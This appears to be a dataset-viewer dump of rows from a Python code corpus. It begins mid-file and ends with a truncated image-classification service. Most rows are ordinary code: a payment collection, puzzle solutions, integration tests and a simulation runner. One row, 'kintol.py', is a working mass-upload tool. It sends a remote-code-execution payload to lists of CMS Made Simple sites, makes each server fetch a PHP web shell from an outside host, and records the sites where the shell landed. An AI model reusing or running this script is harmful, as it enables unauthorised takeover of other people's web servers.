defaultdict\nfrom onegov.core.collection import GenericCollection, Pagination\nfrom onegov.pay.models import Payment\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy.orm import undefer\n\n\nclass PaymentCollection(GenericCollection, Pagination):\n \"\"\" Manages the payment records.\n\n To render a list of payments you might want to also consider the\n :class:`onegov.pay.collection.payable.Paybale` collection, which renders\n payments by loading the linked records first.\n\n \"\"\"\n\n def __init__(self, session, source='*', page=0, start=None, end=None):\n super().__init__(session)\n self.source = source\n self.page = page\n self.start = start\n self.end = end\n\n @property\n def model_class(self):\n return Payment.get_polymorphic_class(self.source, Payment)\n\n def add(self, **kwargs):\n if self.source != '*':\n kwargs.setdefault('source', self.source)\n return super().add(**kwargs)\n\n def __eq__(self, other):\n return all((\n self.source == other.source,\n self.page == other.page,\n self.start == other.start,\n self.end == other.end\n ))\n\n def subset(self):\n q = self.query().order_by(desc(Payment.created))\n\n if self.start:\n q = q.filter(self.start <= Payment.created)\n\n if self.end:\n q = q.filter(Payment.created <= self.end)\n\n q = q.options(joinedload(Payment.provider))\n q = q.options(undefer(Payment.created))\n return q\n\n @property\n def page_index(self):\n return self.page\n\n def page_by_index(self, index):\n return self.__class__(self.session, self.source, index)\n\n def payment_links_for(self, items):\n \"\"\" A more efficient way of loading all links of the given batch\n (compared to loading payment.links one by one).\n\n \"\"\"\n payment_links = defaultdict(list)\n\n for link in Payment.registered_links.values():\n targets = self.session.query(\n getattr(link.table.columns, link.key)\n ).filter(\n link.table.columns.payment_id.in_(tuple(\n p.id for p in items\n ))\n )\n\n q = self.session.query(link.cls)\n q = q.filter(link.cls.id.in_(targets.subquery()))\n q = q.options(joinedload(link.class_attribute))\n\n for record in q:\n payments = getattr(record, link.attribute)\n\n try:\n for payment in payments:\n payment_links[payment.id].append(record)\n except TypeError:\n payment_links[payments.id].append(record)\n\n return payment_links\n\n def payment_links_by_subset(self, subset=None):\n subset = subset or self.subset()\n return self.payment_links_for(subset)\n\n def payment_links_by_batch(self, batch=None):\n batch = batch or self.batch\n\n if not batch:\n return None\n\n return self.payment_links_for(batch)\n"},"avg_line_length":{"kind":"number","value":29.9903846154,"string":"29.990385"},"max_line_length":{"kind":"number","value":76,"string":"76"},"alphanum_fraction":{"kind":"number","value":0.6033985252,"string":"0.603399"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":463,"numItemsPerPage":100,"numTotalItems":48262,"offset":46300,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjYwNjc2Niwic3ViIjoiL2RhdGFzZXRzL2Jqb2VybnAvdGhlLXN0YWNrLWRlZHVwLXB5dGhvbi1kZXVfTGF0biIsImV4cCI6MTc1NjYxMDM2NiwiaXNzIjoiaHR0cHM6Ly9odWdnaW5nZmFjZS5jbyJ9.ktmnIf8a2bqDsgm6i2gW8PpypwSgf7wGLnB0JlmZVw9sckLt5Qivp2__h2v_i3ZzTwAKc8qAalA2wn7CyyjPCQ","displayUrls":true},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
hexsha
stringlengths
40
40
size
int64
6
782k
ext
stringclasses
7 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
237
max_stars_repo_name
stringlengths
6
72
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
list
max_stars_count
int64
1
53k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
184
max_issues_repo_name
stringlengths
6
72
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
list
max_issues_count
int64
1
27.1k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
184
max_forks_repo_name
stringlengths
6
72
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
list
max_forks_count
int64
1
12.2k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
6
782k
avg_line_length
float64
2.75
664k
max_line_length
int64
5
782k
alphanum_fraction
float64
0
1
e97132f3440cd37e82977a22bf1358f03bf479e0
2,491
py
Python
util/ap/py/HouseRobber2.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2016-12-29T03:26:39.000Z
2016-12-29T03:26:39.000Z
util/ap/py/HouseRobber2.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2016-02-09T06:00:07.000Z
2016-02-09T07:20:13.000Z
util/ap/py/HouseRobber2.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
2
2019-06-27T09:07:26.000Z
2019-07-01T04:40:13.000Z
''' You can run it directly to see results. ''' def rob2(nums): # This problem is similar to Rober_I. # # However, for N houses, # the 1st house and the Nth house # can be robbed at the same time. # # So the tricky point is that this # problem can be divided into two # cases: # 1) The first house considered # and the last one not included # # 2) The last house considered # and the first house not included # # Note: 'considered' != 'included' # # More: there may be duplicate sub-cases # between them, which can be # optimal. if len(nums) == 1: return nums res1 = [0, 0] + nums[:-1] res2 = [0, 0] + nums[1:] for i in range(2, len(res1)): res1[i] = max(res1[i] + res1[i - 2], res1[i - 1]) for i in range(2, len(res2)): res2[i] = max(res2[i] + res2[i - 2], res2[i - 1]) end = len(res2) - 1 return res2[1:] if res2[end] > res1[end] else res1[2:] def find_path(nums, res): idx = [] end = len(res) - 1 i = end while i > - 1: if i > 0: if res[i] != res[i - 1]: idx = [i] + idx i -= 2 else: i -= 1 else: if end not in idx: # decide the first one or the last one # should not be included idx = [0] + idx i -= 1 return idx def testcase(): # test cases # assume that each value is an non-negative integer and there's one house at least. tests = [] tests.append([1, 2, 3, 4, 5, 1, 2, 3, 4, 5]) tests.append([1, 2]) tests.append([1]) tests.append([1, 0, 1]) return tests def print_info(tests): n = 55 print '#' * n print print 'Problem: Robber II' print print '=' * n for i, t in enumerate(tests): assert t != [] res = rob2(t) path = find_path(t, res) val_robb = [t[idx] for idx in path] print print 'test case #' + str(i) + ':' print ' Maximal value: ' + str(res[len(res) - 1]) print ' Values of each house: ' + str(t) print ' Indices of the path: ' + str(path) print ' Robbed values: ' + str(val_robb) print print '=' * n def main(): print_info(testcase()) if __name__ == "__main__": main()
21.474138
87
0.481333
f9391250bde4af50d5279bad53d30e72e5c3ee76
1,326
py
Python
src/Sephrasto/DatenbankEinstellung.py
qeqar/Sephrasto
ce46d46299b2c793f015e25c98908773c39b1dee
[ "MIT" ]
1
2022-02-02T16:15:59.000Z
2022-02-02T16:15:59.000Z
src/Sephrasto/DatenbankEinstellung.py
qeqar/Sephrasto
ce46d46299b2c793f015e25c98908773c39b1dee
[ "MIT" ]
1
2022-01-14T11:04:19.000Z
2022-01-14T11:04:19.000Z
src/Sephrasto/DatenbankEinstellung.py
qeqar/Sephrasto
ce46d46299b2c793f015e25c98908773c39b1dee
[ "MIT" ]
null
null
null
class DatenbankEinstellung(object): def __init__(self): self.name = '' self.beschreibung = '' self.wert = '' self.typ = 'Text' #Text, Float, Int oder Bool self.isUserAdded = True def __eq__(self, other) : if self.__class__ != other.__class__: return False return self.__dict__ == other.__dict__ def toFloat(self): assert self.typ == 'Float' return float(self.wert) def toInt(self): assert self.typ == 'Int' return int(self.wert) def toBool(self): assert self.typ == 'Bool' return self.wert.lower() == 'true' or self.wert == '1' def toText(self): assert self.typ == 'Text' return self.wert def toTextList(self, seperator=',', strip=True): if not self.toText(): return [] if strip: return [t.strip() for t in self.toText().split(seperator)] else: return self.toText().split(seperator) def toTextDict(self, seperator=',', strip=True): list = self.toTextList(seperator, strip) dict = {} for el in list: tmp = el.split("=") if strip: dict[tmp[0].strip()] = tmp[1].strip() else: dict[tmp[0]] = tmp[1] return dict
28.826087
70
0.533183
ddf42ec7829667188d8bc30531a4b2cda0535526
4,820
py
Python
Apps/Vorverarbeitung/validate_subjects_tabel.py
RGreinacher/bachelor-thesis
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
[ "MIT" ]
1
2021-04-13T10:00:46.000Z
2021-04-13T10:00:46.000Z
Apps/Vorverarbeitung/validate_subjects_tabel.py
RGreinacher/bachelor-thesis
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
[ "MIT" ]
null
null
null
Apps/Vorverarbeitung/validate_subjects_tabel.py
RGreinacher/bachelor-thesis
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # import python libs import re import json import argparse import json import random from os import listdir from os.path import isfile, join from pprint import pprint as pp from collections import deque import sys sys.path.append('../Auswertung') # import project libs from create_subject_annotation_classes import TARGET_DISTRIBUTION from create_subject_annotation_classes import find_four from helper import * # defining globals & constants SUBJECTS_TABEL_JSON = '/Users/rg/Nextcloud/Uni/Bachelorarbeit/Apps/Vorverarbeitung/subjects_table.json' DISTRIBUTION_TOLERANCE = 2.5 # methods def read_subject_table(file_path): file_handler = open(file_path, 'r', encoding='utf-8') raw_content = file_handler.read() file_handler.close() blocks = json.JSONDecoder().decode(raw_content) return blocks def general_meta_info(subjects_table): for block_index, block in enumerate(subjects_table[0]): print(len(block), 'paragraphs in block', block_index) empty_blocks = empty_subjects_table(subjects_table) for block_index, block in enumerate(empty_blocks): distribution = distribution_per_block(block) print(distribution[5], 'target annotations in block', block_index) def analyze_blocks(subject_blocks, subject_id): level = subject_id % 3 correct_classes = True for block_index, block in enumerate(subject_blocks): distribution = distribution_per_block(block) if (block_index + subject_id) % 2 == 0: if sum(distribution[:5]) != 0: correct_classes = False print('wrong order') break else: if not validate_distribution(distribution, level): correct_classes = False print('bad distribution') break if not validate_fives_for_every_four(block): correct_classes = False print('bad unnecessary annotations') break return correct_classes def distribution_per_block(block): annotation_class_distribution = [0, 0, 0, 0, 0, 0] for paragraph in block: for sentence in paragraph: for annotation_class in sentence: annotation_class_distribution[annotation_class] += 1 return annotation_class_distribution def validate_distribution(distribution, level): correct_distribution = True total_annotations = sum(distribution) for annotation_class, annotation_occurence in enumerate(distribution): percentage = (annotation_occurence / total_annotations) * 100.0 if annotation_class == 3 and annotation_occurence > 0: print('✗ class', annotation_class, ' is present, but should not! Level', level, '(', annotation_occurence, 'occurence(s),', round(percentage, 2), '%)') correct_distribution = False lower_bound = TARGET_DISTRIBUTION[level][annotation_class] - DISTRIBUTION_TOLERANCE upper_bound = TARGET_DISTRIBUTION[level][annotation_class] + DISTRIBUTION_TOLERANCE if not (lower_bound <= percentage <= upper_bound): print('✗ class', annotation_class, ', level', level, '(', round(percentage, 2), ')') correct_distribution = False return correct_distribution def validate_fives_for_every_four(block): for sentence in find_four([block]): start_index = 0 while 4 in sentence[start_index:] and start_index < len(sentence): index = sentence.index(4, start_index) if index > 0 and index < len(sentence) - 1: if sentence[index - 1] < 5 and sentence[index + 1] < 5: print('sentence', index) pp(sentence) return False elif index > 0: if sentence[index - 1] < 5: print('sentence', index) pp(sentence) return False elif index < len(sentence) - 1: if sentence[index + 1] < 5: print('sentence', index) pp(sentence) return False else: print('uncought case!', sentence) start_index = index + 1 return True # entry point as a stand alone script if __name__ == '__main__': blocks = read_subject_table(SUBJECTS_TABEL_JSON) general_meta_info(blocks) all_blocks_passed = True for index, distribution in enumerate(blocks): if not analyze_blocks(blocks[index], index): print('✗ Block', index, 'did not pass the analysis!') all_blocks_passed = False break if all_blocks_passed: print('✓ subjects table is correct!') else: print('✗ bad subjects table!')
34.676259
163
0.645228
34dcf3a0668250a09d13c82faddad2fb78163541
6,034
py
Python
Packs/Claroty/Integrations/Claroty/Claroty_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/Claroty/Integrations/Claroty/Claroty_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/Claroty/Integrations/Claroty/Claroty_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
import dateparser import demistomock as demisto from Claroty import Client, fetch_incidents MOCK_AUTHENTICATION = { "first_name": "admin", "id": 1, "last_name": "admin", "mail": "admin", "password_expired": False, "token": "ok", "username": "admin" } RESOLVE_ALERT_RESPONSE = { "success": True } GET_ASSETS_RESPONSE = { "count_filtered": 1, "count_in_page": 1, "count_total": 1, "objects": [{ "asset_type": 2, "asset_type__": "eEndpoint", "class_type": "IT", "criticality": 0, "criticality__": "eLow", "id": 15, "insight_names": ["Unsecured Protocols", "Windows CVEs"], "ipv4": ["1.1.1.1"], "last_seen": "2020-02-16T10:46:00+00:00", "mac": ["00:0B:AB:1A:DD:DD"], "name": "GTWB", "project_parsed": None, "resource_id": "15-1", "risk_level": 0, "site_id": 1, "site_name": "site-1", "vendor": "Advantech Technology", "virtual_zone_name": "Endpoint: Other" }] } GET_ALERTS_RESPONSE = { "count_filtered": 1, "count_in_page": 1, "count_total": 1, "objects": [{ "actionable_assets": [{ "actionable_id": 15, "asset": { "asset_type": 2, "asset_type__": "eEndpoint", "hostname": "GTWB", "id": 15, "ip": ["1.1.1.1"], "mac": ["00:0B:AB:1A:DD:DD"], "name": "GTWB", "network_id": 1, "os": "Windows XP", "resource_id": "15-1", "site_id": 1, "vendor": "Advantech Technology" }, "id": 174, "resource_id": "174-1", "role": 5, "role__": "ePrimary", "site_id": 1 }], "alert_indicators": [{ "alert_id": 48, "id": 16, "indicator_id": 2, "indicator_info": { "description": "Event occurred out of working hours", "id": 2, "points": 10, "site_id": 1, "type": 1 }, "indicator_result": False, "parent_indicator_id": None, "site_id": 1 }], "description": "A configuration has been downloaded to controller [[Chemical_plant]] by [[1.1.1.1]]," " by user ENG_AB\\Administrator", "network_id": 1, "resolved": False, "resource_id": "48-1", "severity": 3, "severity__": "eCritical", "type": 1001, "type__": "eConfigurationDownload", "timestamp": "2020-02-16T10:46:00+00:00" }] } def _create_client(mocker, requests_mock, request_url, response_json, request_type, **extra_params): mocker.patch.object(demisto, 'params', return_value={ "credentials": { 'identifier': 'user', 'password': 'omgSecretsWow', }, 'url': 'https://website.com', 'fetch_time': '7 days' }) requests_mock.post('https://website.com:5000/auth/authenticate', json=MOCK_AUTHENTICATION) if request_type == "POST" and request_url != 'https://website.com:5000/auth/authenticate': requests_mock.post(request_url, json=response_json) elif request_type == "GET": requests_mock.get(request_url, json=response_json) mocker.patch.object(demisto, 'args', return_value={}) username = demisto.params().get('credentials').get('identifier') password = demisto.params().get('credentials').get('password') base_url = demisto.params()['url'].rstrip('/') + ':5000' verify_certificate = not demisto.params().get('insecure', False) proxy = demisto.params().get('proxy', False) client = Client( base_url=base_url, verify=verify_certificate, credentials=(username, password), proxy=proxy, ) return client def test_claroty_authentication(mocker, requests_mock): client = _create_client(mocker, requests_mock, 'https://website.com:5000/auth/authenticate', MOCK_AUTHENTICATION, "POST") token = client._generate_token()["jwt_token"] assert token == 'ok' def test_claroty_fetch_incidents(mocker, requests_mock): client = _create_client(mocker, requests_mock, "https://website.com:5000/ranger/alerts", GET_ALERTS_RESPONSE, "GET") first_fetch_time = demisto.params().get('fetch_time', '7 days').strip() mocker.patch.object(demisto, 'incidents') nextcheck, incidents = fetch_incidents(client, {'lastRun': dateparser.parse("2018-10-24T14:13:20+00:00")}, first_fetch_time) assert nextcheck['last_fetch'] assert isinstance(incidents, list) assert incidents[0]['severity'] == 4 # Demisto severity is higher by one (doesn't start at 0) assert isinstance(incidents[0]['name'], str) def test_claroty_query_alerts(mocker, requests_mock): client = _create_client(mocker, requests_mock, "https://website.com:5000/ranger/alerts", GET_ALERTS_RESPONSE, "GET") response = client.get_alerts([], {}, []) assert response["objects"][0]["resource_id"] == "48-1" assert response["objects"][0]["severity"] == 3 assert response["objects"][0]["alert_indicators"] def test_claroty_get_assets(mocker, requests_mock): client = _create_client(mocker, requests_mock, "https://website.com:5000/ranger/assets", GET_ASSETS_RESPONSE, "GET") response = client.get_assets([], {}, []) assert response["objects"][0]["resource_id"] == "15-1" assert response["objects"][0]["name"] == "GTWB" assert response["objects"][0]["criticality"] == 0 def test_claroty_resolve_alerts(mocker, requests_mock): client = _create_client(mocker, requests_mock, 'https://website.com:5000/ranger/ranger_api/resolve_alerts', RESOLVE_ALERT_RESPONSE, "POST") response = client.resolve_alert(['1-1'], {}, 1, "Test is good") assert response["success"]
34.48
128
0.581372
9b2a2f24a980d1ba332ac910eaa0647f7f21b238
3,375
py
Python
suite.py
WarcraftPriests/sl-shadow-priest
4c8753592b3cc18c6d2de7e9227e5adb8cef3208
[ "MIT" ]
13
2020-04-10T17:34:49.000Z
2022-02-13T04:04:30.000Z
suite.py
WarcraftPriests/sl-shadow-priest
4c8753592b3cc18c6d2de7e9227e5adb8cef3208
[ "MIT" ]
213
2020-04-10T04:15:00.000Z
2022-01-20T19:18:55.000Z
suite.py
WarcraftPriests/sl-shadow-priest
4c8753592b3cc18c6d2de7e9227e5adb8cef3208
[ "MIT" ]
7
2020-10-08T07:22:08.000Z
2021-07-08T21:09:33.000Z
"""run full suite of sims""" import argparse import csv import os import subprocess import sys import yaml with open("config.yml", "r", encoding="utf8") as ymlfile: config = yaml.load(ymlfile, Loader=yaml.FullLoader) def call_process(process_args): """runs a process and constantly monitors for output""" subprocess.check_call(process_args, stdout=sys.stdout, stderr=subprocess.STDOUT) def update_state(directory, sim_type, output_file, script): """updates state text file""" with open(output_file, 'a+', encoding="utf8") as file: file.write(f"{directory},{sim_type},{script},\n") file.close() def check_state(sim_dir, sim_type, output_file, script): """opens state file to see if the sim has been ran yet""" with open(output_file, 'r', encoding="utf8") as file: sims = csv.reader(file, delimiter=',') for row in sims: if len(row) == 0: continue if row[0] == sim_dir and row[1] == sim_type and row[2] == script: return False return True def generate_args(sim_dir, sim_type, script, ptr): """generates arguments for each script based on input""" arguments = [] if sim_type == "composite": if ptr: arguments = ["python", script, sim_dir, ptr] else: arguments = ["python", script, sim_dir] elif sim_type == "dungeons": if ptr: arguments = ["python", script, sim_dir, "--dungeons", ptr] else: arguments = ["python", script, sim_dir, "--dungeons"] return arguments def run_suite(sim_dir, sim_type, output_file, sim, ptr): """helper function to orchestrate other calls""" if check_state(sim_dir, sim_type, output_file, "profiles"): call_process(generate_args(sim_dir, sim_type, "profiles.py", ptr)) update_state(sim_dir, sim_type, output_file, "profiles") if check_state(sim_dir, sim_type, output_file, "sim"): print(f"Running sim suite for {sim} - Composite") call_process(generate_args(sim_dir, sim_type, "sim.py", ptr)) update_state(sim_dir, sim_type, output_file, "sim") def main(): """main function, runs sim suite""" output_file = "internal/suite.csv" parser = argparse.ArgumentParser(description="Sims full sim suite") parser.add_argument( '--exclude', help='Exclude certain sim folders from the suite run', choices=config["sims"].keys(), default=["apl", "gear", "talent-builds"], nargs='+', required=False) parser.add_argument( '--fresh', help='restart suite from start', action='store_true') parser.add_argument( '--ptr', help='indicate if the sim should use ptr data.', action='store_true') args = parser.parse_args() if args.fresh or not os.path.exists(output_file): with open(output_file, 'w', encoding="utf8") as file: file.write('dir,type,sim,\n') file.close() ptr = "" if args.ptr: print("Running sims with PTR data...") ptr = "--ptr" for sim in config["sims"].keys(): if sim in args.exclude: continue sim_dir = (f"{sim}/") run_suite(sim_dir, "composite", output_file, sim, ptr) run_suite(sim_dir, "dungeons", output_file, sim, ptr) if __name__ == "__main__": main()
33.088235
86
0.623111
1fe1306c59ee5cc7f95e6188f1723c8f2bf1c55e
3,634
py
Python
Kintol_Shell_Upload-main/kintol.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-17T03:35:03.000Z
2021-12-08T06:00:31.000Z
Kintol_Shell_Upload-main/kintol.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
null
null
null
Kintol_Shell_Upload-main/kintol.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-05T18:07:48.000Z
2022-02-24T21:25:07.000Z
# -*- coding: utf-8 -* #!/usr/bin/python #Kintol Upload Shell Rce ##################################### import requests, re, urllib2, os, sys, codecs, random import getpass from base64 import b64encode, b64decode from multiprocessing.dummy import Pool from time import time as timer import time import json from zlib import compress, decompress from platform import system from colorama import Fore from colorama import Style from pprint import pprint from colorama import init from urlparse import urlparse import warnings import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) reload(sys) sys.setdefaultencoding('utf8') init(autoreset=True) ########################################################################################## ktnred = '\033[31m' ktngreen = '\033[32m' ktn3yell = '\033[33m' ktn4blue = '\033[34m' ktn5purp = '\033[35m' ktn6blueblue = '\033[36m' ktn7grey = '\033[37m' CEND = '\033[0m' year = time.strftime("%y") month = time.strftime("%m") ##################################### ########################################################################################## def print_logo(): clear = "\x1b[0m" colors = [36, 32, 34, 35, 31, 37] x = """ . . |-. | ,-. ,-. ,-. ,-. ,-. ,-. ,-. ,-. | | | | | | | -- | | ,-| | | ,. | | | | | `-' `' `-' `-| `-| `-^ ' ' `' `-' ' `-| ,| ,| ,| `' `' `' Tools Made Simple CMS Mass Upload Shell Youtube : Logic Internet Blog : https://www.blog-gan.org ICQ : https://icq.im/Shin403 """ for N, line in enumerate(x.split("\n")): sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear)) time.sleep(0.05) print_logo() start_raw = raw_input("\n\033[91mGive,Me List Dear\033[97m:~# \033[97m") crownes = raw_input("\033[91mthread \033[97m\033[97m:~# \033[97m") try: with open(start_raw, 'r') as f: ooo = f.read().splitlines() except IOError: pass try: ooo = list((ooo)) except NameError: print '\033[31mOpen Your Eyes!' sys.exit() count=0 with open(start_raw,'r')as f: for line in f: count+=1 print '\x1b[91m[\x1b[92m+\x1b[91m]\x1b[92mTOTAL WEBLIST=',count ##### def expr(url): try: headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20150151 Firefox/28.0'} korek = requests.get(url+'/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo%20system(%2527wget%20http://secpriv8.com/met.txt%20-O%20logicinternet.php%2527);{/php}&cntnt01returnid=1', headers=headers,timeout=10) asu = requests.get(url+'/logicinternet.php',headers=headers,timeout=5) if 'Logic_Internet' in asu.content: print ('Logic: ' + url + ' ' + ktn6blueblue+ 'Made Simple CMS' +ktngreen + ' Success' + CEND) open('shells.txt','a').write(url+'/logicinternet.php\n') else: print ('Internet: ' + url + ' ' +ktn6blueblue+ 'Made Simple CMS' +ktnred + ' Failed' + CEND) except: pass ########################################################################################## def Main(): try: start = timer() pp = Pool(int(crownes)) pr = pp.map(expr, ooo) print('TIME TAKE: ' + str(timer() - start) + ' S') except: pass if __name__ == '__main__': Main()
32.738739
258
0.523941
1f648ae25740a60dc9aedf28e9a9bc66631c7a71
50
py
Python
settings.py
LikeToAccess/RCB
37510facf935a9a8559bdd85ac86b292b5764639
[ "MIT" ]
1
2022-02-02T18:08:10.000Z
2022-02-02T18:08:10.000Z
settings.py
LikeToAccess/RCB
37510facf935a9a8559bdd85ac86b292b5764639
[ "MIT" ]
null
null
null
settings.py
LikeToAccess/RCB
37510facf935a9a8559bdd85ac86b292b5764639
[ "MIT" ]
null
null
null
data_drive_letter = "X" maximum_thread_limit = 12
16.666667
25
0.8
1f7c69a914c989f9203df5f4b99f4bd740dcd6ee
7,179
py
Python
contrib/华为云垃圾分类大赛心得与案例-GitLD/src_Xception_all_aug+TTA/deploy_scripts/customize_service.py
huaweicloud/ModelArts-Lab
75d06fb70d81469cc23cd422200877ce443866be
[ "Apache-2.0" ]
1,045
2019-05-09T02:50:43.000Z
2022-03-31T06:22:11.000Z
contrib/华为云垃圾分类大赛心得与案例-GitLD/src_Xception_all_aug+TTA/deploy_scripts/customize_service.py
huaweicloud/ModelArts-Lab
75d06fb70d81469cc23cd422200877ce443866be
[ "Apache-2.0" ]
1,468
2019-05-16T00:48:18.000Z
2022-03-08T04:12:44.000Z
contrib/华为云垃圾分类大赛心得与案例-GitLD/src_Xception_all_aug+TTA/deploy_scripts/customize_service.py
huaweicloud/ModelArts-Lab
75d06fb70d81469cc23cd422200877ce443866be
[ "Apache-2.0" ]
1,077
2019-05-09T02:50:53.000Z
2022-03-27T11:05:32.000Z
import ast import numpy as np from PIL import Image import tensorflow as tf from collections import OrderedDict from tensorflow.python.saved_model import tag_constants from model_service.tfserving_model_service import TfServingBaseService class garbage_classify_service(TfServingBaseService): def __init__(self, model_name, model_path): # these three parameters are no need to modify self.model_name = model_name self.model_path = model_path self.signature_key = 'predict_images' self.input_size = 224 # the input image size of the model # add the input and output key of your pb model here, # these keys are defined when you save a pb file self.input_key_1 = 'input_img' self.output_key_1 = 'output_score' config = tf.ConfigProto(allow_soft_placement=True) with tf.get_default_graph().as_default(): self.sess = tf.Session(graph=tf.Graph(), config=config) meta_graph_def = tf.saved_model.loader.load(self.sess, [tag_constants.SERVING], self.model_path) self.signature = meta_graph_def.signature_def # define input and out tensor of your model here input_images_tensor_name = self.signature[self.signature_key].inputs[self.input_key_1].name output_score_tensor_name = self.signature[self.signature_key].outputs[self.output_key_1].name self.input_images = self.sess.graph.get_tensor_by_name(input_images_tensor_name) self.output_score = self.sess.graph.get_tensor_by_name(output_score_tensor_name) self.label_id_name_dict = \ { "0": "其他垃圾/一次性快餐盒", "1": "其他垃圾/污损塑料", "2": "其他垃圾/烟蒂", "3": "其他垃圾/牙签", "4": "其他垃圾/破碎花盆及碟碗", "5": "其他垃圾/竹筷", "6": "厨余垃圾/剩饭剩菜", "7": "厨余垃圾/大骨头", "8": "厨余垃圾/水果果皮", "9": "厨余垃圾/水果果肉", "10": "厨余垃圾/茶叶渣", "11": "厨余垃圾/菜叶菜根", "12": "厨余垃圾/蛋壳", "13": "厨余垃圾/鱼骨", "14": "可回收物/充电宝", "15": "可回收物/包", "16": "可回收物/化妆品瓶", "17": "可回收物/塑料玩具", "18": "可回收物/塑料碗盆", "19": "可回收物/塑料衣架", "20": "可回收物/快递纸袋", "21": "可回收物/插头电线", "22": "可回收物/旧衣服", "23": "可回收物/易拉罐", "24": "可回收物/枕头", "25": "可回收物/毛绒玩具", "26": "可回收物/洗发水瓶", "27": "可回收物/玻璃杯", "28": "可回收物/皮鞋", "29": "可回收物/砧板", "30": "可回收物/纸板箱", "31": "可回收物/调料瓶", "32": "可回收物/酒瓶", "33": "可回收物/金属食品罐", "34": "可回收物/锅", "35": "可回收物/食用油桶", "36": "可回收物/饮料瓶", "37": "有害垃圾/干电池", "38": "有害垃圾/软膏", "39": "有害垃圾/过期药物" } def addGaussianNoise(self, image, percetage): G_Noiseimg = image.copy() w = image.shape[1] h = image.shape[0] G_NoiseNum = int(percetage * image.shape[0] * image.shape[1]) for i in range(G_NoiseNum): temp_x = np.random.randint(0, h) temp_y = np.random.randint(0, w) G_Noiseimg[temp_x][temp_y][np.random.randint(3)] = np.random.randn(1)[0] return G_Noiseimg # dimming def darker(self, image, percetage=0.9): image_copy = image.copy() w = image.shape[1] h = image.shape[0] # get darker for xi in range(0, w): for xj in range(0, h): image_copy[xj, xi, 0] = int(image[xj, xi, 0] * percetage) image_copy[xj, xi, 1] = int(image[xj, xi, 1] * percetage) image_copy[xj, xi, 2] = int(image[xj, xi, 2] * percetage) return image_copy def brighter(self, image, percetage=1.5): image_copy = image.copy() w = image.shape[1] h = image.shape[0] # get brighter for xi in range(0, w): for xj in range(0, h): image_copy[xj, xi, 0] = np.clip(int(image[xj, xi, 0] * percetage), a_max=255, a_min=0) image_copy[xj, xi, 1] = np.clip(int(image[xj, xi, 1] * percetage), a_max=255, a_min=0) image_copy[xj, xi, 2] = np.clip(int(image[xj, xi, 2] * percetage), a_max=255, a_min=0) return image_copy def center_img(self, img, size=None, fill_value=255): """ center img in a square background """ img = self.addGaussianNoise(img, 0.3) h, w = img.shape[:2] if size is None: size = max(h, w) shape = (size, size) + img.shape[2:] background = np.full(shape, fill_value, np.uint8) center_x = (size - w) // 2 center_y = (size - h) // 2 background[center_y:center_y + h, center_x:center_x + w] = img return background def preprocess_img(self, img): """ image preprocessing you can add your special preprocess method here """ img = img.resize((int(self.input_size), int(self.input_size))) img = img.convert('RGB') img = np.array(img) img = img[:, :, ::-1] return img def _preprocess(self, data): preprocessed_data = {} for k, v in data.items(): for file_name, file_content in v.items(): img = Image.open(file_content) img = self.preprocess_img(img) preprocessed_data[k] = img return preprocessed_data def _inference(self, data): """ model inference function Here are a inference example of resnet, if you use another model, please modify this function """ img = data[self.input_key_1] img1 = self.center_img(img, self.input_size) img2 = self.darker(img) img3 = self.brighter(img) img = img[np.newaxis, :, :, :] # the input tensor shape of resnet is [?, 224, 224, 3] img1 = img1[np.newaxis, :, :, :] img2 = img2[np.newaxis, :, :, :] img3 = img3[np.newaxis, :, :, :] pred_score = self.sess.run([self.output_score], feed_dict={self.input_images: img}) pred_score1 = self.sess.run([self.output_score], 